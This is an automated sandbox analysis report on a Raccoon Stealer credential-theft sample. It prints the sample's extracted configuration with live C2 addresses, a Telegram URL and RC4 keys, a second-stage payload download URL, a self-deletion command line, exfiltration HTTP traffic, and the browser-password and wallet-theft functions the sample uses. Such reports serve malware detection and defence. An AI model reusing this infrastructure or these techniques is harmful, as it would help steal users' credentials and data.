Windows Analysis Report Tk6dsSEyOC.exe

Overview

General Information

Sample Name: Tk6dsSEyOC.exe
Analysis ID: 528742
MD5: 3613e68843dd0c745f079a6ef51a6e6a
SHA1: 87f91a8e3bf01475cf3fe5a690374f95a4fb66c2
SHA256: 271453e30f708718f175654f2b3fb5f4438effb11a928656d58f0051b424c740
Tags: exe, RaccoonStealer
Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Suspicious Del in CommandLine
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Tk6dsSEyOC.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\Tk6dsSEyOC.exe" MD5: 3613E68843DD0C745F079A6EF51A6E6A)
    • cmd.exe (PID: 4572 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6656 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "3be06ec4609b38e474bb469adec52280", "C2 url": ["http://91.219.236.162/masterdanteloma", "http://185.163.47.176/masterdanteloma", "http://193.38.54.238/masterdanteloma", "http://74.119.192.122/masterdanteloma", "http://91.219.236.240/masterdanteloma", "https://t.me/masterdanteloma"], "Bot ID": "14b265e74e2847e8408db7ca21fe6fe2e9ab5767", "RC4_key1": "hGjLqSdWvLpVmBeD"}

Yara Overview

Memory Dumps

Source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security

Unpacked PEs

Source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security
Source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack; Rule: JoeSecurity_Raccoon; Description: Yara detected Raccoon Stealer; Author: Joe Security

                      Sigma Overview

                      System Summary:

Sigma detected: Suspicious Del in CommandLine
Source: Process started; Author: frack113; Data: Command: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", CommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Tk6dsSEyOC.exe", ParentImage: C:\Users\user\Desktop\Tk6dsSEyOC.exe, ParentProcessId: 7164, ProcessCommandLine: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe", ProcessId: 4572

                      Jbx Signature Overview


                      AV Detection:

Multi AV Scanner detection for submitted file
Source: Tk6dsSEyOC.exe; Virustotal: Detection: 49%
Source: Tk6dsSEyOC.exe; ReversingLabs: Detection: 54%
Yara detected Raccoon Stealer
Source: Yara match; File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://188.127.251.217/sys64.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://188.127.251.217/sys64.exe; Virustotal: Detection: 12%
Machine Learning detection for sample
Source: Tk6dsSEyOC.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,0_2_0040E727
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,0_2_0040D560
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,0_2_0042770E
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,0_2_0040F78B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,0_2_004278E1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,0_2_0040DC7B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,0_2_0041E52C

                      Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Unpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
Source: Tk6dsSEyOC.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043DA90
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_0045E752 FindFirstFileExW,0_2_0045E752
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; Code function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA,0_2_00434721
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

                      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49767 -> 91.219.236.69:80
Source: Traffic; Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49767 -> 91.219.236.69:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: http://91.219.236.162/masterdanteloma
Source: Malware configuration extractor; URLs: http://185.163.47.176/masterdanteloma
Source: Malware configuration extractor; URLs: http://193.38.54.238/masterdanteloma
Source: Malware configuration extractor; URLs: http://74.119.192.122/masterdanteloma
Source: Malware configuration extractor; URLs: http://91.219.236.240/masterdanteloma
Source: Malware configuration extractor; URLs: https://t.me/masterdanteloma
Source: Joe Sandbox View; ASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
Source: Joe Sandbox View; JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic; HTTP traffic detected: GET /masterdanteloma HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Content-Type: text/plain; charset=UTF-8; Host: t.me
Source: global traffic; HTTP traffic detected: POST / HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Content-Type: text/plain; charset=UTF-8; Content-Length: 128; Host: 91.219.236.69
Source: global traffic; HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Host: 91.219.236.69
Source: global traffic; HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Host: 91.219.236.69
Source: global traffic; HTTP traffic detected: POST / HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV; Content-Length: 1400; Host: 91.219.236.69
Source: Joe Sandbox View; IP Address: 91.219.236.240 91.219.236.240
Source: Joe Sandbox View; IP Address: 91.219.236.162 91.219.236.162
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Thu, 25 Nov 2021 17:24:09 GMT; Content-Type: application/octet-stream; Content-Length: 916735; Connection: keep-alive; Last-Modified: Sun, 14 Nov 2021 14:06:13 GMT; ETag: "619117d5-dfcff"; Accept-Ranges: bytes
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown; Network traffic detected: HTTP traffic on port 49766 -> 443
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Thu, 25 Nov 2021 17:24:13 GMT; Content-Type: application/octet-stream; Content-Length: 2828315; Connection: keep-alive; Last-Modified: Sun, 14 Nov 2021 14:06:12 GMT; ETag: "619117d4-2b281b"; Accept-Ranges: bytes
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://188.127.251.217/
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://188.127.251.217/sys64.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://188.127.251.217/sys64.exe7e1bbc7bd
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.316126752.0000000000553000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316201744.000000000055A000.00000004.00000001.sdmpString found in binary or memory: http://193119.192.122/
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.316146963.000000000056C000.00000004.00000001.sdmpString found in binary or memory: http://74.119.192.122/
